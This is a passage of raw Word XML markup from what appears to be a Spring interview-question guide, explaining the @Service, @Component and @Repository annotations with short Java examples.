          <v:rect id="_x0000_i2534" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E3104B2" w14:textId="77777777" w:rsidR="00B83F20" w:rsidRPr="00D774B4" w:rsidRDefault="00B83F20"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Purpose of @Service:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="198E12C8" w14:textId="77777777" w:rsidR="00B83F20" w:rsidRPr="00D774B4" w:rsidRDefault="00B83F2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Marks the class as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring-managed bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A734EA1" w14:textId="77777777" w:rsidR="00B83F20" w:rsidRPr="00D774B4" w:rsidRDefault="00B83F2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Indicates the class holds </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>service-layer logic</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (used between controller and repository layers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349C7DBC" w14:textId="77777777" w:rsidR="00B83F20" w:rsidRPr="00D774B4" w:rsidRDefault="00B83F2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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Helps in </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>separation of concerns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729069E3" w14:textId="77777777" w:rsidR="00B83F20" w:rsidRPr="00D774B4" w:rsidRDefault="00B83F2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Enables </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatic detection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> through component scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293B2C71" w14:textId="77777777" w:rsidR="00B83F20"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BF40E3B">
          <v:rect id="_x0000_i2535" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E24B202" w14:textId="77777777" w:rsidR="00B83F20" w:rsidRPr="00D774B4" w:rsidRDefault="00B83F20"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CDD117" w14:textId="77777777" w:rsidR="00B83F20" w:rsidRPr="00D774B4" w:rsidRDefault="00B83F2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ervice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32DB3B72" w14:textId="77777777" w:rsidR="00B83F20" w:rsidRPr="00D774B4" w:rsidRDefault="00B83F2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EmployeeService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8440F5" w14:textId="77777777" w:rsidR="00B83F20" w:rsidRPr="00D774B4" w:rsidRDefault="00B83F20" w:rsidP="00D774B4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FBCC7DA" w14:textId="77777777" w:rsidR="00B83F20" w:rsidRPr="00D774B4" w:rsidRDefault="00B83F2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String getEmployeeName() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="784BCFA8" w14:textId="77777777" w:rsidR="00B83F20" w:rsidRPr="00D774B4" w:rsidRDefault="00B83F2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John Doe";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6A5B97" w14:textId="77777777" w:rsidR="00B83F20" w:rsidRPr="00D774B4" w:rsidRDefault="00B83F2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7E48778F" w14:textId="77777777" w:rsidR="00B83F20" w:rsidRPr="00D774B4" w:rsidRDefault="00B83F2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3D1FA2A2" w14:textId="77777777" w:rsidR="00B83F20" w:rsidRPr="00D774B4" w:rsidRDefault="00B83F2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You can inject it in another class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01AEFA18" w14:textId="77777777" w:rsidR="00B83F20" w:rsidRPr="00D774B4" w:rsidRDefault="00B83F2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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BD2B02" w14:textId="77777777" w:rsidR="00B83F20" w:rsidRPr="00D774B4" w:rsidRDefault="00B83F2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rivate EmployeeService employeeService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6427BFB9" w14:textId="77777777" w:rsidR="00B83F20"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CD2CF5E">
          <v:rect id="_x0000_i2536" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F2FE70" w14:textId="77777777" w:rsidR="00B83F20" w:rsidRPr="00D774B4" w:rsidRDefault="00B83F20"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Internally:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C17ED8B" w14:textId="77777777" w:rsidR="00B83F20" w:rsidRPr="00D774B4" w:rsidRDefault="00B83F2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pring treats @Service, @Component, @Repository, and @Controller the same in terms of component scanning, but they are used for semantic clarity and sometimes for additional behavior (e.g., @Repository enables exception translation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D00EC0D" w14:textId="77777777" w:rsidR="00B83F20"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6A0C22">
          <v:rect id="_x0000_i2537" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="676C809E" w14:textId="77777777" w:rsidR="00B83F20" w:rsidRPr="00D774B4" w:rsidRDefault="00B83F20"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In short:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> @Service is used to annotate classes that contain the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>core business logic</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of your application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D74C893" w14:textId="7B50314D"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ACC511B">
          <v:rect id="_x0000_i2538" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1D64C8" w14:textId="47DFBCC7" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="591" w:name="_Toc196308071"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the use of @Component annotation in spring?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="591"/>
    </w:p>
    <w:p w14:paraId="2071B046" w14:textId="40DDB7FF" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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The @Component annotation in Spring is used to indicate that a class is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring-managed component (bean)</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. It is the most </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>generic stereotype annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>superclass for</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> other annotations like @Service, @Repository, and @Controller.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44844073" w14:textId="77777777" w:rsidR="009F6D6F"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067CC0A">
          <v:rect id="_x0000_i2539" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A95F82" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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Purpose of @Component:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC1CF00"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Marks the class as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>candidate for component scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522F057F"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Allows Spring to </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>detect and register the bean automatically</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F2B273"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Enables </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>dependency injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the class where needed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B4D366" w14:textId="77777777" w:rsidR="009F6D6F"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90B9386">
          <v:rect id="_x0000_i2540" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="191EC002" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB8B8EF"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mponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089B891C"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UtilityService {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E7BA4F"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String getMessage() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E338F3"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Hello from Component!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450C8A5C"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0D24BB39"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552F3E57"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And you can inject it like this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10777822"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524872BD"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rivate UtilityService utilityService;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406693F4" w14:textId="77777777" w:rsidR="009F6D6F"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C2720C6">
          <v:rect id="_x0000_i2541" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A46C292" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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Where to use it:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A32717"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Use @Component when the class </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>doesn't clearly fit</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> into the roles of:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591F8534"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ntroller (web layer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294612A7"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ervice (business layer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004666B1"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pository (data access layer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DE357F" w14:textId="77777777" w:rsidR="009F6D6F"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420FC09">
          <v:rect id="_x0000_i2542" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B70E86" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F" w:rsidP="00D774B4">
      <w:pPr>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In short:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">@Component makes a class eligible for </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>auto-detection and dependency injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> by Spring. It's a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>general-purpose annotation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for defining Spring beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7529EE49" w14:textId="61F57043"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CA85C9A">
          <v:rect id="_x0000_i2543" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="771261EF" w14:textId="3F1AB1CB" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="592" w:name="_Toc196308072"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is the use of @Repository annotation in spring?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="592"/>
    </w:p>
    <w:p w14:paraId="4F1B457D" w14:textId="0A3FFFE1" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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The @Repository annotation in Spring is used to indicate that a class is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>data access layer</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, typically responsible for interacting with the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>database</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6445AAF8" w14:textId="77777777" w:rsidR="009F6D6F"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518A11B">
          <v:rect id="_x0000_i2544" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBCCEC6" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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Purpose of @Repository:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6955643C"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Marks the class as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring-managed bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BF337A1"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Indicates it handles </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CRUD operations or database interaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA9C933"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Enables </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatic exception translation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (converts low-level persistence exceptions into Spring’s DataAccessException hierarchy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6898555C" w14:textId="77777777" w:rsidR="009F6D6F"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CE9674C">
          <v:rect id="_x0000_i2545" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="370F8E3A" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD01ECF"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pository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3ADFF0"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EmployeeRepository {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66ADD406"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Employee getEmployeeById(int id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35ABE237"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JDBC or ORM code to fetch employee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E12315F"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3AFCD7BD"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10ED396A"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Or when using Spring Data JPA:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C0637B"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pository</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB56CEE"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interface EmployeeRepository extends JpaRepository&lt;Employee, Integer&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D20BB0F"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3BB4E4B3" w14:textId="77777777" w:rsidR="009F6D6F"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12C83F5">
          <v:rect id="_x0000_i2546" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B66DFD" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F"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Why use it over @Component?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A636E9"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While @Component also registers the class as a Spring bean, @Repository is more </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>semantically specific</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and enables features like </w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>exception translation</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, which is not available with @Component.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D9564BC" w14:textId="77777777" w:rsidR="009F6D6F"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3CF346E">
          <v:rect id="_x0000_i2547" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="07463CD8" w14:textId="77777777" w:rsidR="009F6D6F" w:rsidRPr="00D774B4" w:rsidRDefault="009F6D6F" w:rsidP="00D774B4">
      <w:pPr>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In short:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D774B4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
